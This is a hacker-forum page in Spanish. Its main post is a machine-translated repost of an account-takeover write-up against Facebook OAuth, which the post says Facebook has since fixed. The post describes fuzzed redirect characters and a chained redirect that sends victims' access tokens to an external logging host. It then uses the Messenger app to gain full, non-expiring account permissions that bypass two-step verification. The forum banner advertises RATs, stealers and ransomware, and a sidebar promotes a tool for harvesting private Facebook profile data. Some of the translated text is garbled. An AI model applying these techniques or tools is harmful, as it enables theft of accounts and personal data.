Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Sign in to follow this  
      dEEpEst

      Cómo pirateé Facebook OAuth para obtener un permiso completo en cualquier cuenta de Facebook

      Recommended Posts

      Staff

      Cómo pirateé Facebook OAuth para obtener un permiso completo en cualquier cuenta de Facebook

      Para que este exploit funcione, la víctima solo necesita visitar una página web, 
      así que OAuth es utilizado por Facebook para comunicarse entre usuarios de aplicaciones y Facebook. Usualmente los usuarios deben permitir / aceptar la solicitud para acceder a su cuenta antes de que la comunicación pueda comenzar. 

      Cualquier aplicación de Facebook puede solicitar diferentes permisos. 

      Por ejemplo: 

      Diamond Dash, Texas Holdem Poker solo tiene permiso para obtener información básica y publicar en el muro del usuario 

      . Encontré una forma de obtener permisos completos (leer en la bandeja de entrada, en la bandeja de salida, administrar páginas, administrar anuncios, leer fotos privadas, videos, etc.) sobre la cuenta de la víctima incluso sin ninguna aplicación instalada en la cuenta de la víctima,
      Otra ventaja de la falla que encontré es que no existe una "fecha de caducidad" del Token como lo habría en cualquier otro uso de la aplicación. En mi ataque el token nunca caduca a menos que la víctima cambie su contraseña . 

      Entonces, la URL del OAuth el diálogo se ve así: 

      https: //www.facebook...ERMISSION_NAMES


      Cada aplicación en Facebook tiene diferentes id_aplicaciones, por ejemplo, 'Diamante Dash' será app_id = 2, y 'Texas Holdem Poker' será app_id = 3 

      El siguiente, El parámetro redirect_uri (next =, redirect_uri =) solo acepta el dominio de la aplicación propietaria. 
      Por ejemplo, app_id = 2389801228 pertenece a la aplicación 'Texas Holdem Poker', por lo que el 'siguiente' parámetro permitirá solo el dominio zynga.com (es decir, next = http: //zynga.com),
      Si el dominio es diferente (nirgoldshlager.com) en el parámetro 'siguiente', 'redirect_uri', Facebook bloqueará esta acción, 

      Facebook realizará una coincidencia entre su app_id y su próximo parámetro, Facebook también envía el token de acceso a través de la solicitud GET al propietario aplicación después de que el usuario lo permitió, 
      ahora que sabemos cómo funciona Facebook OAuth, vamos a hablar sobre mis hallazgos, 
      comencé a pensar en mis opciones, ¿qué pasa si puedo redirigir la solicitud OAuth de la aplicación a una URL 'SIGUIENTE' diferente? Primero intenté cambiar el parámetro 'siguiente' por un dominio diferente y ellos bloquearon mi acción. 
      Luego intenté cambiar el siguiente parámetro al dominio facebook.com, y me bloquearon nuevamente con un mensaje de error general,


      Descubrí que si usa un subdominio, por ejemplo: xxx.facebook.com, Facebook permitirá esta acción, 
      pero si intenta acceder a carpetas / archivos en x.facebook.com (x.facebook.com/xx/x .php), Facebook te bloquea, 
      entonces noto que facebook.com usa un signo Hash y! allí URL (x.facebook.com/#!/xxxx), 
      traté de realizar esta acción en el siguiente parámetro (next = x.facebook.com /% 23! /), ¡y Facebook me bloqueó nuevamente !, 
      entonces intentado poner "algo" entre el signo de hash y el! (% 23x!), Y Facebook no bloqueó esta acción, 
      Parece que hay una protección Reg-ex, ¡Genial !, ¡ 

      Pero espera !, 

      si ponemos algo como esto ( https://beta.facebook.com/# xxx! / messages /), la acción no se tratará en ¡es lo mismo que #! en nuestro cliente, y no nos redirigirá a la pantalla del mensaje, 
      pensé que tenía que encontrar una manera de evitarlo, ¡así que comencé a confundir personajes entre ellos! y # para que pueda hacer que cualquier navegador (IE, CHROME, Safari, Firefox ...) lo trate como # !, ¡ 

      Ahora es el momento de difuminar !, 

      Resultado: ¡ 

      % 23 ~! (Funciona en todos los navegadores) 
      % 23% 09! (Funciona en todos los navegadores) 

      ¡Genial! Este truco funciona en touch.facebook.com/#%09!/,m.facebook.com/#~!/, o en cualquier otro móvil de Facebook, toque el dominio), 

      así que ahora yo ' puedo redirigir a la víctima a cualquier archivo / directorio en cualquier subdominio de Facebook,
      Luego creé una aplicación de Facebook que redireccionará a la víctima al sitio web externo para enviar el access_token de la víctima a mi sitio web externo "malicioso". 

      Por ejemplo: (Zynga Texas Holdem OAuth Bypass):


      https: //www.facebook...onse_type=token '> https: //www.facebook...onse_type=token 


      El siguiente parámetro se redirigirá a mi aplicación de Facebook (touch.facebook.com/apps/testestestte), 
      y mi aplicación de Facebook redireccionará a files.nirgoldshlager.com domain y guardará a la víctima access_token en un archivo de registro (files.nirgoldshlager.com/log.txt), 

      Amazing !, ahora puedo robar tokens de acceso de cualquier aplicación de Facebook, 

      ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡Espera !! 


      AQUÍ VIENE LA REAL ACCIÓN: 

      para hacer un ataque exitoso, la víctima necesita usar una aplicación de Facebook (Texas Holdem Poker, Diamond
      Y estas aplicaciones solo tienen permisos básicos. Siempre podemos cambiar el alcance del permiso de la aplicación y establecer un nuevo permiso, pero este método no es poderoso, ya que la víctima debe aceptar los nuevos permisos de la aplicación (https: //www.facebook...s read_requests), 


      ¡quería algo más poderoso !, 

      algo que me daría todos los permisos (leer en la bandeja de entrada, en la bandeja de salida, administrar páginas, administrar anuncios, acceder a fotos privadas, videos, etc.) en la cuenta de la víctima sin ninguna aplicación instalada en la víctima y hacer que Facebook haga el Goldshake , 

      entonces comencé a pensar 
      ¿Cómo se puede hacer esto ?, 
      ¿Qué pasa si voy a usar un app_id diferente? app_id de Facebook Messenger por ejemplo, 
      ¿necesita el usuario aceptar la aplicación Facebook Messenger en su cuenta de Facebook ?, 

      la respuesta es no, 
      hay aplicaciones integradas en Facebook que los usuarios nunca deben aceptar, y esta aplicación tiene un control total sobre su cuenta,
      También encontré que este access_token nunca expiró en Facebook Messenger, 


      solo después de que la víctima cambiara su contraseña, entonces el access_token caducará, pero ¿por qué demonios el usuario cambiaría su contraseña ?, 

      PoC (funciona en todos los navegadores, no necesita instalarse) aplicación en la cuenta de la víctima): 


      https: //www.facebook...onse_type=token


      Seguridad de Facebook Corregido este error 

      Descripción completa del permiso para la aplicación de mensajería de Facebook:

      ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login 

      Funciona también en cuentas de verificación de 2 pasos, cuando se trata de access_token, la verificación de 2 pasos fallará. 

      ¿¿¿Y??? 

      Video Tutorial

       

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Sign in to follow this  

      • Similar Content

        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By ZeroDayF34r
          Creo que seria un tema interesante a tratar el tema de el WAF de Claudflare, pues si no obtienes la ip no vas a poder auditar bien la aplicación web o el equipo, así que, hace poco estuve haciendo una y me tope con un problema con Claudflare, y es que el método o los métodos y herramientas que utilizaba ya no me sirven para hacerme con la ip de origen, así que creo que seria buen tema a tratar para los pentesters, yo tengo mis técnica que saque de internet, así como herramientas y demás, pero no me ha funcionado esta vez, todos sabemos que Claudflare de pago es con figurable para ataques varios, así que al entrar el factor humano en juego pueden haber fallos de seguridad, pero aun así se conseguía sacar la ip, que me paso esta vez?
          La verdad que estoy esperando a hacerme con ella, si alguien lo hace yo compartiré los métodos que están en internet, y bueno alguno tengo yo por que dependiendo de la información que vaya teniendo pues puedo saber si.................por ejemplo si se que tiene cierto puerto y no es un puerto común pues eso me dará otra vía para poder encontrar la ip, que fue lo que me paso en este caso, pero por falta de tiempo no puede hacerme con ella, y estoy que .........descansare un poco y me pondré a ello, pues antes si la conseguía, deben a ver puesto mas seguridad o no se, estara configurado muy bien, aunque las configuraciones son para ataques varios, no lo se la verdad.
          Pero lo voy a investigar, si podeis compartir vuestros conocimientos yo comparto los míos, es mas, a mi me da igual publicarlo como lo hago pero no me han servido.
          En cuando me conteste alguien sigo el hilo así no pierdo tiempo ni os hago perder tiempo leyendo si no vals a contestar.
          Un saludo a todos señ[email protected]
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Shadowpost, it’s a complete Facebook Poster solution for Page & Group that allows you to auto post (Text / links / Images / Videos) to Facebook, schedule and manage. Shadowpost include carousel posting & CTA posting. Shadowpost has auto Reply, Auto comment, Auto Like & Auto Share with comment hide delete. It is a web-based app and fairly easy to use and easy to operate. You can manage all those Facebook Posting from one place. Managing all posting media for business purpose is a huge pain. Shadowpost helps you save time managing multiple Facebook accounts. So we made this to make your life easy.
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.  
        • By dEEpEst
          FBI is an accurate facebook account information gathering, all sensitive information can be easily gathered even though the target converts all of its privacy to (only me), Sensitive information about residence, date of birth, occupation, phone number and email address.
          Hidden Content
          Give reaction to this post to see the hidden content.